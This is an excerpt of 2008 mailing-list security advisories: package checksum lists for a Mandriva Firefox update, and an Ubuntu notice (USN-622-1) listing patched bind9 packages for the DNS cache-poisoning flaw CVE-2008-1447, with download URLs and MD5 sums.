2008.1/x86_64/gnome-python-gdl-2.19.1-10.2mdv2008.1.x86_64.rpm 36de4f356527891446fdc96c80a16655 2008.1/x86_64/gnome-python-gksu-2.19.1-10.2mdv2008.1.x86_64.rpm fa4569d00f46f71e32f24d58b5838e50 2008.1/x86_64/gnome-python-gtkhtml2-2.19.1-10.2mdv2008.1.x86_64.rpm 569c547c0d42001d38c4ad597c5e5d61 2008.1/x86_64/gnome-python-gtkmozembed-2.19.1-10.2mdv2008.1.x86_64.rpm cc5d5aa3e8333f731014ba223546dd29 2008.1/x86_64/gnome-python-gtkspell-2.19.1-10.2mdv2008.1.x86_64.rpm 685edb52118dc3a909eb27f04a339f31 2008.1/x86_64/lib64devhelp-1_0-0.19-3.2mdv2008.1.x86_64.rpm 0bdf6ec2b01bd5941b308802989334c1 2008.1/x86_64/lib64devhelp-1-devel-0.19-3.2mdv2008.1.x86_64.rpm b1c2188803c0c253fe89379eb5fae59c 2008.1/x86_64/lib64gluezilla0-1.2.6.1-2.2mdv2008.1.x86_64.rpm 9e3735eaa425ade5f915dbec618d4f43 2008.1/x86_64/lib64mozilla-firefox2.0.0.15-2.0.0.15-1.1mdv2008.1.x86_64.rpm 
2ebd840b7f80fc9601383e27a644a17c 2008.1/x86_64/lib64mozilla-firefox-devel-2.0.0.15-1.1mdv2008.1.x86_64.rpm 2e4b4c6bc0999fa25211a1b29ea71e31 2008.1/x86_64/mozilla-firefox-2.0.0.15-1.1mdv2008.1.x86_64.rpm c6b0b6bb0d8309ce3f40162b564783e6 2008.1/x86_64/mozilla-firefox-af-2.0.0.15-1mdv2008.1.x86_64.rpm 5c20fa3dcccae535c3b0eb761de9c037 2008.1/x86_64/mozilla-firefox-ar-2.0.0.15-1mdv2008.1.x86_64.rpm 39d48ecd7d20e545bf3136b488b0f5b8 2008.1/x86_64/mozilla-firefox-be-2.0.0.15-1mdv2008.1.x86_64.rpm ebc55186b6c8a7ef8db8c0e70311accc 2008.1/x86_64/mozilla-firefox-bg-2.0.0.15-1mdv2008.1.x86_64.rpm 81aebd660acf8fb3974c0af8d6ebb208 2008.1/x86_64/mozilla-firefox-br_FR-2.0.0.15-1mdv2008.1.x86_64.rpm 66dd1d068a46659d617373d0a2714417 2008.1/x86_64/mozilla-firefox-ca-2.0.0.15-1mdv2008.1.x86_64.rpm 5a206d036a8839d35dfbca5161f35e3c 2008.1/x86_64/mozilla-firefox-cs-2.0.0.15-1mdv2008.1.x86_64.rpm 4bfcb67516ea3be0fb325c48706a74b1 2008.1/x86_64/mozilla-firefox-da-2.0.0.15-1mdv2008.1.x86_64.rpm 66424b46727f556a4d27197b31882de8 2008.1/x86_64/mozilla-firefox-de-2.0.0.15-1mdv2008.1.x86_64.rpm f4002640c6c47845c6ccd1e6f39100d0 2008.1/x86_64/mozilla-firefox-el-2.0.0.15-1mdv2008.1.x86_64.rpm ef2141268bb22e3091c1af08c6499fe5 2008.1/x86_64/mozilla-firefox-en_GB-2.0.0.15-1mdv2008.1.x86_64.rpm c349744113dd7a0e0eb4a829b3d422be 2008.1/x86_64/mozilla-firefox-es_AR-2.0.0.15-1mdv2008.1.x86_64.rpm f2d4a5ae4fc8beb76eadab57ea37e8ba 2008.1/x86_64/mozilla-firefox-es_ES-2.0.0.15-1mdv2008.1.x86_64.rpm 0dbd3f8c42fc0121d13372548f9254b8 2008.1/x86_64/mozilla-firefox-et_EE-2.0.0.15-1mdv2008.1.x86_64.rpm 5cdf4de54e7024179128b796ae492f11 2008.1/x86_64/mozilla-firefox-eu-2.0.0.15-1mdv2008.1.x86_64.rpm 0a4929c289299ae720bc3062c7c1a98d 2008.1/x86_64/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.1.x86_64.rpm 3cccde3949b07102f3f9384b32563c10 2008.1/x86_64/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.1.x86_64.rpm 9efd9c25d5440b168ce2cf226ef6ebd9 2008.1/x86_64/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.1.x86_64.rpm 
1551a0840dd18b65827b9a59af4f80a2 2008.1/x86_64/mozilla-firefox-fi-2.0.0.15-1mdv2008.1.x86_64.rpm 67816be6027625b80825b5db024e7ca7 2008.1/x86_64/mozilla-firefox-fr-2.0.0.15-1mdv2008.1.x86_64.rpm afdbd5d9b2e6e5c69b07e7c326e3d880 2008.1/x86_64/mozilla-firefox-fy-2.0.0.15-1mdv2008.1.x86_64.rpm 3b6fc0522bfdb0ed2617df2186488e62 2008.1/x86_64/mozilla-firefox-ga-2.0.0.15-1mdv2008.1.x86_64.rpm 12a0a359ccda2393129c30a44015bae1 2008.1/x86_64/mozilla-firefox-gnome-support-2.0.0.15-1.1mdv2008.1.x86_64.rpm fe6b15f455bdc581b3d71db753178370 2008.1/x86_64/mozilla-firefox-gu_IN-2.0.0.15-1mdv2008.1.x86_64.rpm 5511002085fb74189433ad6805886614 2008.1/x86_64/mozilla-firefox-he-2.0.0.15-1mdv2008.1.x86_64.rpm 24957f0408e3dc30c3fc9903458d805b 2008.1/x86_64/mozilla-firefox-hu-2.0.0.15-1mdv2008.1.x86_64.rpm aa57fc3c315d61de4ff7cb08cb3fb10b 2008.1/x86_64/mozilla-firefox-it-2.0.0.15-1mdv2008.1.x86_64.rpm d901d5ba293ba69a3b37eeb2ac596cbf 2008.1/x86_64/mozilla-firefox-ja-2.0.0.15-1mdv2008.1.x86_64.rpm 9cdd9eae53286c1ef9a82620401c08dc 2008.1/x86_64/mozilla-firefox-ka-2.0.0.15-1mdv2008.1.x86_64.rpm c18344b16974c940a593a6fd40b13530 2008.1/x86_64/mozilla-firefox-ko-2.0.0.15-1mdv2008.1.x86_64.rpm 6f5d7b5f7f09e14f70498f67b61e392f 2008.1/x86_64/mozilla-firefox-ku-2.0.0.15-1mdv2008.1.x86_64.rpm 2f61b6499fa96286b9098ba9ec2760f4 2008.1/x86_64/mozilla-firefox-lt-2.0.0.15-1mdv2008.1.x86_64.rpm 3ff58be9d71630a2e8c127ba204c6459 2008.1/x86_64/mozilla-firefox-mk-2.0.0.15-1mdv2008.1.x86_64.rpm fd44fb8c74d5c0f0190c2d1ac812234f 2008.1/x86_64/mozilla-firefox-mn-2.0.0.15-1mdv2008.1.x86_64.rpm 24ab94819a38619b96e59888cf4b4c5a 2008.1/x86_64/mozilla-firefox-nb_NO-2.0.0.15-1mdv2008.1.x86_64.rpm 3902587245aaeaa3bfdd22cffe45f0c7 2008.1/x86_64/mozilla-firefox-nl-2.0.0.15-1mdv2008.1.x86_64.rpm d98511e7142f6656c3540ace6e3c2074 2008.1/x86_64/mozilla-firefox-nn_NO-2.0.0.15-1mdv2008.1.x86_64.rpm d29f19f8d7af9b9cea380f413c3cc430 2008.1/x86_64/mozilla-firefox-pa_IN-2.0.0.15-1mdv2008.1.x86_64.rpm 6c15753f17c58e4d24a6da564a331f1f 
2008.1/x86_64/mozilla-firefox-pl-2.0.0.15-1mdv2008.1.x86_64.rpm bf96bc723c8ebcf5fa75a583312a6adf 2008.1/x86_64/mozilla-firefox-pt_BR-2.0.0.15-1mdv2008.1.x86_64.rpm a5f989d8309611955e4e00e8f852cc50 2008.1/x86_64/mozilla-firefox-pt_PT-2.0.0.15-1mdv2008.1.x86_64.rpm 345a328dbbcde67d73b46fd8bc9a5e93 2008.1/x86_64/mozilla-firefox-ro-2.0.0.15-1mdv2008.1.x86_64.rpm 3f488dedbc4f64d2a2db19882a653f36 2008.1/x86_64/mozilla-firefox-ru-2.0.0.15-1mdv2008.1.x86_64.rpm c75225da56c47187e151350896cf5c42 2008.1/x86_64/mozilla-firefox-sk-2.0.0.15-1mdv2008.1.x86_64.rpm 798186b190d46bfbbfcd684d0c69a1e9 2008.1/x86_64/mozilla-firefox-sl-2.0.0.15-1mdv2008.1.x86_64.rpm cf7dc2a91c88112af38c69c0c58c4995 2008.1/x86_64/mozilla-firefox-sv_SE-2.0.0.15-1mdv2008.1.x86_64.rpm 7b0054a3a1f901be2dbed7c9366f79a3 2008.1/x86_64/mozilla-firefox-theme-gnome-2.0.0-7mdv2008.1.x86_64.rpm 828cb88707ad3beed0d794c6da2503e7 2008.1/x86_64/mozilla-firefox-theme-kdeff-0.4-7mdv2008.1.x86_64.rpm 7fc01e6ff956054524030c789c33dbe7 2008.1/x86_64/mozilla-firefox-tr-2.0.0.15-1mdv2008.1.x86_64.rpm 438b697762f6f939e78a4802742f17e5 2008.1/x86_64/mozilla-firefox-uk-2.0.0.15-1mdv2008.1.x86_64.rpm 84382017a3406d68dea7a5e84bb9c528 2008.1/x86_64/mozilla-firefox-zh_CN-2.0.0.15-1mdv2008.1.x86_64.rpm ab0e91b7f9287fc0955b5af61725e4e7 2008.1/x86_64/mozilla-firefox-zh_TW-2.0.0.15-1mdv2008.1.x86_64.rpm 53caeb79adedeeb098ff6f1cc2a01e8d 2008.1/x86_64/totem-2.22.0-4.2mdv2008.1.x86_64.rpm ba2712447171bfe1dc143d318075ea10 2008.1/x86_64/totem-common-2.22.0-4.2mdv2008.1.x86_64.rpm 650493aa0c5c00d1dcef7d8808a75108 2008.1/x86_64/totem-gstreamer-2.22.0-4.2mdv2008.1.x86_64.rpm 2b6bf2398c7d9d14583e43b860516bff 2008.1/x86_64/totem-mozilla-2.22.0-4.2mdv2008.1.x86_64.rpm c56af8589581f03fb839952225adbca0 2008.1/x86_64/totem-mozilla-gstreamer-2.22.0-4.2mdv2008.1.x86_64.rpm 3a0c3df94871e5fc48cd6e8fec1efc48 2008.1/x86_64/yelp-2.22.0-2.2mdv2008.1.x86_64.rpm 3196744e1e3594540284ad1ada3ca4fb 2008.1/SRPMS/devhelp-0.19-3.2mdv2008.1.src.rpm 
a5cc93c5bf1460255c9e9fd84cd173bc 2008.1/SRPMS/epiphany-2.22.0-4.2mdv2008.1.src.rpm e888ef9a8bef85515d9c74a6ad8c27f5 2008.1/SRPMS/galeon-2.0.4-3.2mdv2008.1.src.rpm 56e88cd192af2268db247ca2f5c90cd7 2008.1/SRPMS/gluezilla-1.2.6.1-2.2mdv2008.1.src.rpm 99cd4a98919eb78877c2753501c9b122 2008.1/SRPMS/gnome-python-extras-2.19.1-10.2mdv2008.1.src.rpm 415409af7ab11039e61582336090b347 2008.1/SRPMS/mozilla-firefox-2.0.0.15-1.1mdv2008.1.src.rpm a105bac35cd9a4a4832901dfaac96f72 2008.1/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.1.src.rpm a4f2e889fa2c0812c39041feb935ccef 2008.1/SRPMS/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.1.src.rpm 6c72fc55e1cf2d0c9212f96979182202 2008.1/SRPMS/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.1.src.rpm ebb96058ed42569f2ea7a0d613b3e868 2008.1/SRPMS/mozilla-firefox-l10n-2.0.0.15-1mdv2008.1.src.rpm 4f282392c5177706a3f64df3cdb362b7 2008.1/SRPMS/mozilla-firefox-theme-gnome-2.0.0-7mdv2008.1.src.rpm 9f2b2425c98681a1d4743401300fce76 2008.1/SRPMS/mozilla-firefox-theme-kdeff-0.4-7mdv2008.1.src.rpm 9c996ac02a215975ecdc14cb86336cd5 2008.1/SRPMS/totem-2.22.0-4.2mdv2008.1.src.rpm a7285d39afcf1d396cbcf419f37ba4f6 2008.1/SRPMS/yelp-2.22.0-2.2mdv2008.1.src.rpm Corporate 3.0: ef75f05ce92edf53c56bfa7e93009bf2 corporate/3.0/i586/libnspr4-2.0.0.15-0.1.C30mdk.i586.rpm a3fa368f19fde843dd95a5b8fcc98def corporate/3.0/i586/libnspr4-devel-2.0.0.15-0.1.C30mdk.i586.rpm f2dc04a411983213526b6300fd440966 corporate/3.0/i586/libnspr4-static-devel-2.0.0.15-0.1.C30mdk.i586.rpm 636afda2ac271d5f573ecd6a9af2425a corporate/3.0/i586/libnss3-2.0.0.15-0.1.C30mdk.i586.rpm 79467b8c2dfbad978e2df70d7f991dd1 corporate/3.0/i586/libnss3-devel-2.0.0.15-0.1.C30mdk.i586.rpm 584d239bf6274470c0830cc5a5466376 corporate/3.0/i586/mozilla-firefox-2.0.0.15-0.1.C30mdk.i586.rpm 39b48b3a3e3f0d5cdba5b100f0939d20 corporate/3.0/i586/mozilla-firefox-ar-2.0.0.15-0.1.C30mdk.i586.rpm 4041354006e8ca5045b83fb87d5c09a7 corporate/3.0/i586/mozilla-firefox-bg-2.0.0.15-0.1.C30mdk.i586.rpm 
d56332790506a07adf73b1b93d70f261 corporate/3.0/i586/mozilla-firefox-br-2.0.0.15-0.1.C30mdk.i586.rpm b5e277eb20970d61b5953832abe21f97 corporate/3.0/i586/mozilla-firefox-ca-2.0.0.15-0.1.C30mdk.i586.rpm 6759b8e97693cac73b11f670febb3c6c corporate/3.0/i586/mozilla-firefox-cs-2.0.0.15-0.1.C30mdk.i586.rpm 27fe969d9531353e0c9321cfd9945c96 corporate/3.0/i586/mozilla-firefox-da-2.0.0.15-0.1.C30mdk.i586.rpm 7b279caff391841a9ac3aeddd2c38212 corporate/3.0/i586/mozilla-firefox-de-2.0.0.15-0.1.C30mdk.i586.rpm f51b7d8acb9bc9c53f15ea23d8760d63 corporate/3.0/i586/mozilla-firefox-devel-2.0.0.15-0.1.C30mdk.i586.rpm fc9fa23d4e1c223afbef3d0e581605ac corporate/3.0/i586/mozilla-firefox-el-2.0.0.15-0.1.C30mdk.i586.rpm 8289a4c1e73cd0f23cedccb33ca9ed42 corporate/3.0/i586/mozilla-firefox-es-2.0.0.15-0.1.C30mdk.i586.rpm 6ead96bbbffbefb5e7e7f8e574fbcf27 corporate/3.0/i586/mozilla-firefox-es_AR-2.0.0.15-0.1.C30mdk.i586.rpm 051f093598c6c34342bf2c80e02fc1b9 corporate/3.0/i586/mozilla-firefox-eu-2.0.0.15-0.1.C30mdk.i586.rpm d3166a7dcc36db911045b865143a6958 corporate/3.0/i586/mozilla-firefox-fi-2.0.0.15-0.1.C30mdk.i586.rpm a8856d1ccddd8336185c42fc582b57ce corporate/3.0/i586/mozilla-firefox-fr-2.0.0.15-0.1.C30mdk.i586.rpm 5a7a0fd04a89eab4ff6ad4cf6087068d corporate/3.0/i586/mozilla-firefox-fy-2.0.0.15-0.1.C30mdk.i586.rpm 2e5f8b99e783fa83a7780f4f634e6234 corporate/3.0/i586/mozilla-firefox-ga-2.0.0.15-0.1.C30mdk.i586.rpm ae4b5362240e0d673dad7744648fa31b corporate/3.0/i586/mozilla-firefox-gu_IN-2.0.0.15-0.1.C30mdk.i586.rpm ca07409227067edb78ff98ac2cda30ce corporate/3.0/i586/mozilla-firefox-he-2.0.0.15-0.1.C30mdk.i586.rpm b6fc3c224b90e3e8a5182afb7029f9ba corporate/3.0/i586/mozilla-firefox-hu-2.0.0.15-0.1.C30mdk.i586.rpm 814b8a0f2f24141b56584804efdd5ecd corporate/3.0/i586/mozilla-firefox-it-2.0.0.15-0.1.C30mdk.i586.rpm a3d8e5ec418421e5547dc7512f4599e6 corporate/3.0/i586/mozilla-firefox-ja-2.0.0.15-0.1.C30mdk.i586.rpm d3e59bd35273b8e9b34bca0d553c22b4 
corporate/3.0/i586/mozilla-firefox-ko-2.0.0.15-0.1.C30mdk.i586.rpm 3af743b17ba6954e9d77c87e89bd0128 corporate/3.0/i586/mozilla-firefox-lt-2.0.0.15-0.1.C30mdk.i586.rpm c32d88e756fb9fd578583b5c10170311 corporate/3.0/i586/mozilla-firefox-mk-2.0.0.15-0.1.C30mdk.i586.rpm 5309d13216e4fef73dfd738952ddcc39 corporate/3.0/i586/mozilla-firefox-nb-2.0.0.15-0.1.C30mdk.i586.rpm 926325f90f8f97870155078c863ea57a corporate/3.0/i586/mozilla-firefox-nl-2.0.0.15-0.1.C30mdk.i586.rpm c21554d42ebc29769fbf941c1660b037 corporate/3.0/i586/mozilla-firefox-pa_IN-2.0.0.15-0.1.C30mdk.i586.rpm 53e722a03b25df282eeffc45508b90e1 corporate/3.0/i586/mozilla-firefox-pl-2.0.0.15-0.1.C30mdk.i586.rpm 9cdf239ed95a3a49d0e63399a86eef82 corporate/3.0/i586/mozilla-firefox-pt-2.0.0.15-0.1.C30mdk.i586.rpm 9942460a55172d86b65004b84161d54b corporate/3.0/i586/mozilla-firefox-pt_BR-2.0.0.15-0.1.C30mdk.i586.rpm 015c1f46f027a3db40a9eb998a0a783b corporate/3.0/i586/mozilla-firefox-ro-2.0.0.15-0.1.C30mdk.i586.rpm 73cdfdb1faa612f708366448e82beffe corporate/3.0/i586/mozilla-firefox-ru-2.0.0.15-0.1.C30mdk.i586.rpm 0f385398f5fd0448a5bc0baf45e2719f corporate/3.0/i586/mozilla-firefox-sk-2.0.0.15-0.1.C30mdk.i586.rpm cdb8ef12da908724c15d1d4f4dc890bc corporate/3.0/i586/mozilla-firefox-sl-2.0.0.15-0.1.C30mdk.i586.rpm 2cfe3e49d01019d141cb62143d3b6bb1 corporate/3.0/i586/mozilla-firefox-sv-2.0.0.15-0.1.C30mdk.i586.rpm 1ec32eb7ccd87c7138c9f2a65e8cc451 corporate/3.0/i586/mozilla-firefox-tr-2.0.0.15-0.1.C30mdk.i586.rpm bcb6a277b2cc22c93e7d97f408d35fd3 corporate/3.0/i586/mozilla-firefox-uk-2.0.0.15-0.1.C30mdk.i586.rpm 05cb84123d67709136944238a3a7b47e corporate/3.0/i586/mozilla-firefox-zh_CN-2.0.0.15-0.1.C30mdk.i586.rpm 9d14565763dfceb45c8af92236f1995e corporate/3.0/i586/mozilla-firefox-zh_TW-2.0.0.15-0.1.C30mdk.i586.rpm ee1e837a087dbd3df1767c85301c4655 corporate/3.0/SRPMS/mozilla-firefox-2.0.0.15-0.1.C30mdk.src.rpm ee2a600a518aaae667977510c8b2b1d3 corporate/3.0/SRPMS/mozilla-firefox-l10n-2.0.0.15-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: 
f0093a0056eb4d99a3366f63f16fec88 corporate/3.0/x86_64/lib64nspr4-2.0.0.15-0.1.C30mdk.x86_64.rpm 1d5fe9532d7327c95a5eccdd54d5cf50 corporate/3.0/x86_64/lib64nspr4-devel-2.0.0.15-0.1.C30mdk.x86_64.rpm fcc4d2d271eff505ab104aa55f78f3dc corporate/3.0/x86_64/lib64nspr4-static-devel-2.0.0.15-0.1.C30mdk.x86_64.rpm 88bd58d55555a946d9b46c2ed65823b2 corporate/3.0/x86_64/lib64nss3-2.0.0.15-0.1.C30mdk.x86_64.rpm f3d4b77ba1f1bd35888aee892ef8b849 corporate/3.0/x86_64/lib64nss3-devel-2.0.0.15-0.1.C30mdk.x86_64.rpm 96509380961504faf309bffbaa58e5c6 corporate/3.0/x86_64/mozilla-firefox-2.0.0.15-0.1.C30mdk.x86_64.rpm 04c6c6d88adf4397a378df1a13f37997 corporate/3.0/x86_64/mozilla-firefox-ar-2.0.0.15-0.1.C30mdk.x86_64.rpm 833aaa2eb32dcaa8fab0a6119d85b3f9 corporate/3.0/x86_64/mozilla-firefox-bg-2.0.0.15-0.1.C30mdk.x86_64.rpm e8d1d92dadd35788afe5ea2561628dc6 corporate/3.0/x86_64/mozilla-firefox-br-2.0.0.15-0.1.C30mdk.x86_64.rpm d56ac1b418d988a03ad6a6c6ce2118e5 corporate/3.0/x86_64/mozilla-firefox-ca-2.0.0.15-0.1.C30mdk.x86_64.rpm 443572a6ab6ca5b96c4bd5b278b1c1f5 corporate/3.0/x86_64/mozilla-firefox-cs-2.0.0.15-0.1.C30mdk.x86_64.rpm 71d1eb73f9c538453feb682a90cd7e87 corporate/3.0/x86_64/mozilla-firefox-da-2.0.0.15-0.1.C30mdk.x86_64.rpm 1f8217d0d6a96cda43a7259add4f6b70 corporate/3.0/x86_64/mozilla-firefox-de-2.0.0.15-0.1.C30mdk.x86_64.rpm 5999334dda00d8362985ab7404a4556c corporate/3.0/x86_64/mozilla-firefox-devel-2.0.0.15-0.1.C30mdk.x86_64.rpm 0f845fc76d2e9e52fdb596422cabf57b corporate/3.0/x86_64/mozilla-firefox-el-2.0.0.15-0.1.C30mdk.x86_64.rpm 1553954278c975e95fac7eb44d833561 corporate/3.0/x86_64/mozilla-firefox-es-2.0.0.15-0.1.C30mdk.x86_64.rpm 56bfa14e2cdf1682a7d9fb7da53160f8 corporate/3.0/x86_64/mozilla-firefox-es_AR-2.0.0.15-0.1.C30mdk.x86_64.rpm 81ecfa18d14d05dc8da02ba2b12270cc corporate/3.0/x86_64/mozilla-firefox-eu-2.0.0.15-0.1.C30mdk.x86_64.rpm b86a49b8c4deaaadad670ede76e7bf24 corporate/3.0/x86_64/mozilla-firefox-fi-2.0.0.15-0.1.C30mdk.x86_64.rpm 67e32edd23831a3032230c3bb65657a1 
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIc7BBmqjQ0CJFipgRAnEdAKDFKQBMgXiQJat6WJmbwZnntrTYDwCdFDKK
47yaGgNP0pfndZrak/3gm7U=
=LxFj
-----END PGP SIGNATURE-----

From kees at ubuntu.com Tue Jul 8 22:19:56 2008
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 8 Jul 2008 14:19:56 -0700
Subject: [Full-disclosure] [USN-622-1] Bind vulnerability
Message-ID: <20080708211955.GW5794@outflux.net>

===========================================================
Ubuntu Security Notice USN-622-1              July 08, 2008
bind9 vulnerability
CVE-2008-1447
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libdns21                        1:9.3.2-2ubuntu1.5

Ubuntu 7.04:
  libdns22                        1:9.3.4-2ubuntu2.3

Ubuntu 7.10:
  libdns32                        1:9.4.1-P1-3ubuntu2

Ubuntu 8.04 LTS:
  libdns35                        1:9.4.2-10ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Dan Kaminsky discovered weaknesses in the DNS protocol as implemented
by Bind. A remote attacker could exploit this to spoof DNS entries and
poison DNS caches. Among other things, this could lead to misdirected
email and web traffic.
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 550042 268c59c90f72e47690a2f64fccc296c6 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 138186 5f08619b4b4198fb6176f4d914e74b54 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 24666 f584f72af33412695ab6cfb81c891ee4 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 44570 f63b6e57da24654d0ffc243936a5a153 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 42802 4542b6bea7110e1cbf557346fc5536ad http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 171006 c96cfef97c3950ab59b80a7b1d3aa868 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 44692 62a8e406937a5be466977c5b47f9a659 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 267508 da18e50b8467dbd7730640a09c52d188 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 110460 480313c340c47e5d6f5167c11161daa7 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 1065190 6fe78d85bdae7a9970c769dd2d1ebdcf http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 27254 2ba88324a0225ccab2b826dcc2f0f202 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 493370 5916fe8f22b1a19d0dde5f9e9596353f http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 125982 26501d011be6c34b7874b19ceabd0148 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 22852 13693beb84952c55cf78f4275c39aba7 
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 38258 34107c4916cb13ac651d16706e9d9b9a http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 40058 443bc171d30e2f262bb8ce2e3bfe885e http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 159118 b31758442a36011d79dde9c485fca1da lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 45254 659ea8656a46bc1265f0bf3049ffc511 http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 267536 13c20e925a9a9ae1353b63fde5ce8555 http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 111858 ce4c215e0dfc3a4c1e53b431264becf7 http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 1068570 9680708be2a7840be99f2894234757bf http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 27248 f0a51f7ebaeb86afa2f466c1e4b1b4c0 http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 488706 325b144544a6dfd1917210c9a02ec423 http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 122606 316c7a93002a350fa04f7956483c6efe http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 22522 66d3aaa993507238b341578bb534a0aa http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 37670 b58cc5a2d27f02cac5b954cf4cb1cec5 http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 39810 6a5c7b4e2a52a61258d86618f3a27106 http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 158506 b2064557c74e536b96d77a707068c933 powerpc architecture (Apple Macintosh G3/G4/G5): 
http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 49064 77fb0a3b0c381e9f4cf561240f801e99 http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 297108 927db70c3f13cb7642f8e9dfe9d2e378 http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 124214 fb0b53b2b7f5fd750c3ee3785038efea http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 1271364 32f252c1f510f5d0f5f2860a75fccf8b http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 29764 2111df6f219f9e4a421329209eee6489 http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 529240 e66e625de5160092f4ac4b9b505bd3ae http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 137960 e581851a0e71ada301415c006e5697d9 http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 26412 12e5213a39740e05cdf4ed87dbfd055e http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 43508 b8aab766d691b13f0df8796252bfe7a5 http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 44292 78170e54852c2e28718dd26c72148165 http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 171502 0c747e830656e34d4cd5b84f8ee38551 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 46786 2f07cd43ef71146ec839172a9318eb22 